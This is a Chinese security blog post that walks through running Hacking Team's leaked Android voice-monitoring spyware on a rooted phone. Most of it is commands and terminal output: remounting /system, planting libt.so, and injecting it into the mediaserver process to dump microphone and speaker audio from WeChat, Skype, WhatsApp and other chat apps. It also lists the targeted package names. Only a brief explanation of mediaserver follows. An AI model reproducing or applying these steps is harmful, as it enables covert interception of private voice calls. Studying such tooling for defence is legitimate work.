【移动安全】HacktingTeam Android语音监控实践及分析

1、查看Android语音监控我们可以发现,目前可以实现对7款语音聊天软件进行监控,Hangouts、palchat、skype、viber、wechat、whatsapp、zeno

2、网上下载的源代码中包含pack目录,其下为编译好的libtc.so和hijack及shell脚本,实验时需要确保手机具有Root权限

3、注入原理主要是利用hijack(开源工具)将libt.so库(自研工具)注入到各个语音聊天进程中或直接注入mediaserver进程中,如微信的语音聊天进程为com.tencent.mm,然后利用注入的so中的语音处理函数对系统语音函数进行替换,实现劫持并保存想要的语音数据。


实验过程:android4.2微信最新版本举例

readme.txt内容如下:

1] cp libt.so in /system/lib/

2] ./setup_log.sh (pialla i log e restituisce il pid di mediaserver)
3] ./instrument.sh pid di mediaserver


output:
- log, log testuali
- log_in, dump mic
- log_out, dump speaker

查看进程:

#ps | grep -v system找到微信的进程号为22357,本次不对此进程进行注入,直接对mediaserver进程注入

u0_a158   22212 208   870924 41292 ffffffff 40232004 S com.qihoo.appstore
u0_a188   22357 208   1166680 87884 ffffffff 40232004 S com.tencent.mm
u0_a15    22423 208   856124 28620 ffffffff 40232004 S com.sec.android.provider
badge
u0_a188   22491 208   907760 48224 ffffffff 40232004 S com.tencent.mm:tools

#cp libt.so /system/lib

#sh ./setup_log.sh

实际脚本内容如下:删除原有程序启动监控后生成的文件

rm log 
touch log
rm log_in 
touch log_in 
rm log_out 
touch log_out 
ps | grep mediaserver


root@android:/sdcard/pack # sh ./instrument.sh 22357
sh ./instrument.sh 22357 di mediaserver
Too many memory mapping
cannot read memory map
can't find address of mprotect(), error!
1|root@android:/sdcard/pack # sh ./instrument.sh 22357
sh ./instrument.sh 22357 di mediaserver
Too many memory mapping
cannot read memory map
can't find address of mprotect(), error!
1|root@android:/sdcard/pack #


无法注入微信进程,改为注入mediaserver
1|root@android:/mnt/shell/emulated/0/pack # cp libt.so /system/lib/
cp libt.so /system/lib/
cp: /system/lib/libt.so: Read-only file system
1|root@android:/mnt/shell/emulated/0/pack # mount -o rw,remount /system
mount -o rw,remount /system
root@android:/mnt/shell/emulated/0/pack # cp libt.so /system/lib/
cp libt.so /system/lib/
root@android:/mnt/shell/emulated/0/pack #


root@android:/mnt/shell/emulated/0/pack # ./setup_log.sh
./setup_log.sh
k_shell/2000:6229: ./setup_log.sh: can't execute: Permission denied
126|root@android:/mnt/shell/emulated/0/pack # sh ./setup_log.sh
sh ./setup_log.sh
media     211   1     102200 16432 ffffffff 4026d108 S /system/bin/mediaserver
root@android:/mnt/shell/emulated/0/pack # sh ./instrument.sh 211
sh ./instrument.sh 211
mprotect: 0x4026d038
dlopen: 0x400db0d1
pc=4026d104 lr=40280ab9 sp=beffb900 fp=beffb9cc
r0=3 r1=c0186201
r2=beffb920 r3=beffb91c
stack: 0xbefdb000-0xbeffc000 leng = 135168
executing injection code at 0xbeffb8b0
library injection completed!
root@android:/mnt/shell/emulated/0/pack #

接下来即可查看日志和生成的语音文件信息。

下面是代码中支持的可以监控的软件列表

const char *pid_name[]={
"com.skype.raider",
"com.viber.voip",
"com.whatsapp",
"com.tencent.mm",
"com.facebook.",
"jp.naver.line.android",
"com.google.android.talk"
"/system/bin/mediaserver",
"unknown"
};

附件:

android上的多媒体服务是有一个叫做mediaserver的服务进程提供的。这个进程通过binder的进程间通信方式来完成其他进程(如音乐播放器)的请求。
mediaserver服务器进程的实现代码在/frameworks/base/media/mediaserver目录下,代码很小。
也就是说,在启动系统的时候,mediaserver会启动,这样也会随之添加了服 务:media.audio_flinger, media.player, media.camera, media.audio_policy。
这些服务会响应来自上层的MediaPlayer的服务请求,主要有声音播放,多 媒体文件的播放,摄像头操作,音频管理等。



你可能感兴趣的:(MobileSecurity)